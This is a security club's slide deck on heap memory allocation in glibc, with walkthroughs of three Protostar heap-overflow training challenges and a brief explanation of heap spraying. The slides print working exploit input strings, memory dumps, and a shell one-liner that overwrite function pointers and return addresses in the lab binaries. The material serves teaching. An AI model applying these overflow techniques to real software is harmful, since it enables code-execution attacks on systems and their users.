SlideShare a Scribd company logo

Heap Base Exploitation

UTD Computer Security Group
UTD Computer Security Group

We introduce the fundamentals of dynamic memory allocation and highlight several exploitable properties. These ideas are put into practice in a set of heap overflow challenges from exploit-exercise.com's Protostar VM. We walk through the first three. Other uses of heap space such as heap spraying are mentioned.

Technology
1 of 47
Download to read offline
Scott Hand CSG 2/22/12 HEAP BASED EXPLOITATION
 Heap Basics  Overview of Exercise Environment Protostar  Heap0  Heap1  Heap2  Heap3  Heap Spraying  Conclusion WHAT WE WILL COVER…
Heap Background and Theory BASICS
 We know about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down WHAT IS THE HEAP?
 glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space MEMORY ALLOCATION DATA STRUCTURES
BINNING Size: 16 Size: 24 Size: 32 Size: 512 Size: 576 Size: 231… … Chunk 1 Chunk 2 Chunk 3 Chunk 4 Chunk 5
 Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths SOME CONSEQUENCES
 We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem MALLOC EXAMPLE
FIRST ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
SECOND ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
THIRD ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
 Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); FREE EXAMPLE
BEFORE FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
AFTER FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
AFTER SECOND FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
AFTER THIRD FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
 Here’s the chunk structure with important parts bolded: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk* fd; struct malloc_chunk* bk; /* Only for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; struct malloc_chunk* bk_nextsize; }; LOOKING AT MALLOC.C…
 Looks like, for whatever reason, this machine uses singly linked lists rather than doubly linked lists  We only have the size and fd values to modify SOME OBSERVATIONS
 3 Virtual Machines with Challenges  Nebula – Basic exploitation for people with no experience  Protostar – Lots of real-world exploits without some of the modern exploit mitigation systems  Fusion – Advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems.  We will use Protostar. It has 4 heap-based exploitation challenges EXPLOIT-EXERCISES.COM
 Heap0 – Basic heap overflow  Heap1 – More complicated overflow  Heap2 – Stale pointers  Heap3 – Heap metadata manipulation HEAP CHALLENGES
Basic OverflowHEAP0
 Goal – We want to change the function pointer that points to nowinner() to point to winner() instead  Description from author: This level introduces heap overflows and how they can influence code flow. HEAP0 - OVERVIEW
 Relevant Code: struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %pn", d, f); strcpy(d->name, argv[1]); f->fp(); HEAP0 - CODE
0x804a000: 0x00000000 0x00000049 0x00000000 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT BEFORE STRCPY d f nowinner()
0x804a000: 0x00000000 0x00000049 0x41414141 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT AFTER STRCPY d f nowinner() “AAAA”
 If we overflow the character buffer in d, we can overwrite the function pointer f  The distance from f to d is 0x804a050-0x804a008 = 72  The pointer for winner() is 0x8048464  Python Code: print "A"*72 + "x64x84x04x08" HEAP0 – EXPLOIT CREATION
0x804a000: 0x00000000 0x00000049 0x41414141 0x41414141 0x804a010: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a020: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a030: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a040: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a050: 0x08048464 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – INVALID INPUT AFTER STRCPY d f winner()
Tougher OverflowHEAP1
 Goal – Execute the winner() function again. But it’s not so obvious how this will happen.  There are two allocations and two strcpy commands  There are no function pointers. What should we overwrite?  Description from Author: This level takes a look at code flow hijacking in data overwrite cases. HEAP1 - OVERVIEW
 Relevant Code struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]); HEAP1 –CODE
 This instruction is the important one: strcpy(i2->name, argv[2]);  We are moving an argument into a pointer stored at i2->name  Can we change the destination of our argument? HEAP1 – EXPLOIT IDEAS
0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT BEFORE STRCPY i1->name i1 i2 i2->name
0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x41414141 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x42424242 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT AFTER STRCPY i1->name = “AAAA”i1 i2 i2->name = “BBBB”
 Let’s overflow i1->name to overwrite i2->name’s pointer  Where to point?  Return address!  20 characters of padding “A” characters  Return address is stored at 0xbffff79c  Address of winner() is 0x08048494  Python Code for overflow (i1):  print "A"*20 + "x9cxf7xffxbf"  Shell Code for replacement (i2):  printf "x94x84x04x08"  Final exploit:  `python -c 'print "A"*20 + "x9cxf7xffxbf"'` `printf "x94x84x04x08"` HEAP1 – EXPLOIT CREATION
Stale PointersHEAP2
 Goal – According to the problem description, this level is completed when you see the "you have logged in already!" message  Description from Author: This level examines what can happen when heap pointers are stale. HEAP2 - OVERVIEW
 For each input loop, the following commands are parsed:  auth  Description: Allocates memory for auth pointer, clears it, then copies the user input into it  Code: auth = malloc(sizeof(auth)); memset(auth, 0, sizeof(auth)); if(strlen(line + 5) < 31) { strcpy(auth->name, line + 5); }  service  Description: Changes the service pointer to a duplicate of the provided input  Code: service = strdup(line + 7); HEAP2 – PROGRAM DESCRIPTION
 For each input loop, the following commands are parsed:  reset  Description: Frees the auth pointer  Code: free(auth);  login  Description: Simulates a login. If the auth->auth field is nonzero, then the user is logged in. Otherwise, we get a dummy password prompt.  Code: if(auth->auth) { printf("you have logged in already!n"); } else { printf("please enter your passwordn"); } HEAP2 – PROGRAM DESCRIPTION
 This program calls malloc() for auth using sizeof(auth)  sizeof(auth) returns 4 because it’s returning the size of the pointer, not the size of the struct  However, calls to auth->auth still access memory well beyond its allocated 4 bytes HEAP2 – VULNERABILITY
 Let’s call “auth CSG” to set up our auth pointer  Then call “service” with a bunch of non-zero garbage  Then, auth->auth will overflow auth’s buffer into service’s buffer and read a non-zero integer.  Python Exploit: print "auth CSGnservice " + "A"*16 + "nlogin" HEAP2 – EXPLOIT
HEAP2 – EXPLOIT VISUALIZED What the programmer thinks happened: auth size auth->name auth->auth 0x804c000 0x804c008 0x804c028 service size service data 0x804c030 0x804c038 What actually happened: 0x804c000 0x804c008 auth size 0x804c018 0x804c020 service size service data 0x804c028 auth->name auth->auth auth->auth is non-zero
Metadata CorruptionHEAP3
 Try this one on your own  We’ll go over the solution next week HEAP3 – OVERVIEW
More Heap AbuseHEAP SPRAYING
 The memory allocation algorithm’s tendency towards contiguous chunk placement can be used for evil yet again  In browser, PDF, Flash, etc. exploitation in which the user can control memory allocations (usually via scripting languages like JavaScript), payload placement is usually done on the heap  How do we reliably find our payload in the potentially fragmented heap?  Fill up an entire chunk with NOP sled + payload and spray it repeatedly into the heap  Once the allocator fills in the gaps for the heap fragmentation, we get a nice big contiguous landing area HEAP SPRAYING
CONCLUSION
 Links:  http://www.exploit-exercises.com  https://www.corelan.be/index.php/2011/12/31/exploit-writing- tutorial-part-11-heap-spraying-demystified/  Any questions? CONCLUSION

Recommended

Heaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptHeaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptdamesmith
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelPeter Hlavaty
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger TutorialAnurag Tomar
 
semaphore & mutex.pdf
semaphore & mutex.pdfsemaphore & mutex.pdf
semaphore & mutex.pdfAdrian Huang
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksKapil Nagrale
 
Loader
LoaderLoader
Loaderjayashri kolekar
 

Recommended

Heaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptHeaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptdamesmith
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelPeter Hlavaty
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger TutorialAnurag Tomar
 
semaphore & mutex.pdf
semaphore & mutex.pdfsemaphore & mutex.pdf
semaphore & mutex.pdfAdrian Huang
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksKapil Nagrale
 
Loader
LoaderLoader
Loaderjayashri kolekar
 
Loader
LoaderLoader
Loadernikhilshrama
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Angel Boy
 
Browsing Linux Kernel Source
Browsing Linux Kernel SourceBrowsing Linux Kernel Source
Browsing Linux Kernel SourceMotaz Saad
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCanSecWest
 
Tips of Malloc & Free
Tips of Malloc & FreeTips of Malloc & Free
Tips of Malloc & FreeTetsuyuki Kobayashi
 
WSL Reloaded
WSL ReloadedWSL Reloaded
WSL ReloadedAnthony LAOU-HINE TSUEI
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
C++ shared libraries and loading
C++ shared libraries and loadingC++ shared libraries and loading
C++ shared libraries and loadingRahul Jamwal
 
Sha
ShaSha
Shaha123
 
Bruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find VulnerabilitiesBruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find VulnerabilitiesPriyanka Aash
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...Adrian Huang
 
Macro-processor
Macro-processorMacro-processor
Macro-processorTemesgen Molla
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully BlueHat Security Conference
 
MD5
MD5MD5
MD5rokham khawaja
 
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...Adrian Huang
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3UTD Computer Security Group
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash CourseUTD Computer Security Group
 

More Related Content

What's hot

malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Angel Boy
 
Browsing Linux Kernel Source
Browsing Linux Kernel SourceBrowsing Linux Kernel Source
Browsing Linux Kernel SourceMotaz Saad
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCanSecWest
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
C++ shared libraries and loading
C++ shared libraries and loadingC++ shared libraries and loading
C++ shared libraries and loadingRahul Jamwal
 
Bruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find VulnerabilitiesBruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find VulnerabilitiesPriyanka Aash
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
 
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...Adrian Huang
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully BlueHat Security Conference
 
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...Adrian Huang
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 

What's hot (20)

Loader
LoaderLoader
Loader
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in Linux
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)
 
Browsing Linux Kernel Source
Browsing Linux Kernel SourceBrowsing Linux Kernel Source
Browsing Linux Kernel Source
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_markCSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
 
Tips of Malloc & Free
Tips of Malloc & FreeTips of Malloc & Free
Tips of Malloc & Free
 
WSL Reloaded
WSL ReloadedWSL Reloaded
WSL Reloaded
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
C++ shared libraries and loading
C++ shared libraries and loadingC++ shared libraries and loading
C++ shared libraries and loading
 
Sha
ShaSha
Sha
 
Bruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find VulnerabilitiesBruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
Bruh! Do you even diff?—Diffing Microsoft Patches to Find Vulnerabilities
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
qemu + gdb + sample_code: Run sample code in QEMU OS and observe Linux Kernel...
 
Macro-processor
Macro-processorMacro-processor
Macro-processor
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux Kernel
 
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully
 
MD5
MD5MD5
MD5
 
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
qemu + gdb: The efficient way to understand/debug Linux kernel code/data stru...
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 

Similar to Heap Base Exploitation

HBase at Xiaomi
HBase at XiaomiHBase at Xiaomi
HBase at XiaomiHBaseCon
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5PRADEEP
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLConnor McDonald
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet FiltersKernel TLV
 
Microprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMicroprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMd Abdus Sobur Sikdar
 
Direct SGA access without SQL
Direct SGA access without SQLDirect SGA access without SQL
Direct SGA access without SQLKyle Hailey
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051SANTIAGO PABLO ALBERTO
 
Fundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisFundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisDmitry Vostokov
 
8085 micro processor
8085 micro processor8085 micro processor
8085 micro processorArun Umrao
 

Similar to Heap Base Exploitation (20)

Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Microprocessor lecture 2
Microprocessor lecture 2Microprocessor lecture 2
Microprocessor lecture 2
 
HBase at Xiaomi
HBase at XiaomiHBase at Xiaomi
HBase at Xiaomi
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQL
 
8051
80518051
8051
 
8086
80868086
8086
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
 
Microprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMicroprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackhole
 
Direct SGA access without SQL
Direct SGA access without SQLDirect SGA access without SQL
Direct SGA access without SQL
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051
 
Fundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisFundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump Analysis
 
mpmc cse ppt.pdf
mpmc cse ppt.pdfmpmc cse ppt.pdf
mpmc cse ppt.pdf
 
8085 micro processor
8085 micro processor8085 micro processor
8085 micro processor
 

More from UTD Computer Security Group

UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group
 

More from UTD Computer Security Group (20)

Py jail talk
Py jail talkPy jail talk
Py jail talk
 
22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)
 
Cloud talk
Cloud talkCloud talk
Cloud talk
 
UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domain
 
Forensics audio and video
Forensics audio and videoForensics audio and video
Forensics audio and video
 
Computer networks and network security
Computer networks and network securityComputer networks and network security
Computer networks and network security
 
Intro to python
Intro to pythonIntro to python
Intro to python
 
Powershell crash course
Powershell crash coursePowershell crash course
Powershell crash course
 
Intro to cybersecurity
Intro to cybersecurityIntro to cybersecurity
Intro to cybersecurity
 
Intro to Bash
Intro to BashIntro to Bash
Intro to Bash
 
Web Exploitation
Web ExploitationWeb Exploitation
Web Exploitation
 
Network Exploitation
Network ExploitationNetwork Exploitation
Network Exploitation
 
Penetration Testing: Celestial
Penetration Testing: CelestialPenetration Testing: Celestial
Penetration Testing: Celestial
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Cryptography Crash Course
Cryptography Crash CourseCryptography Crash Course
Cryptography Crash Course
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
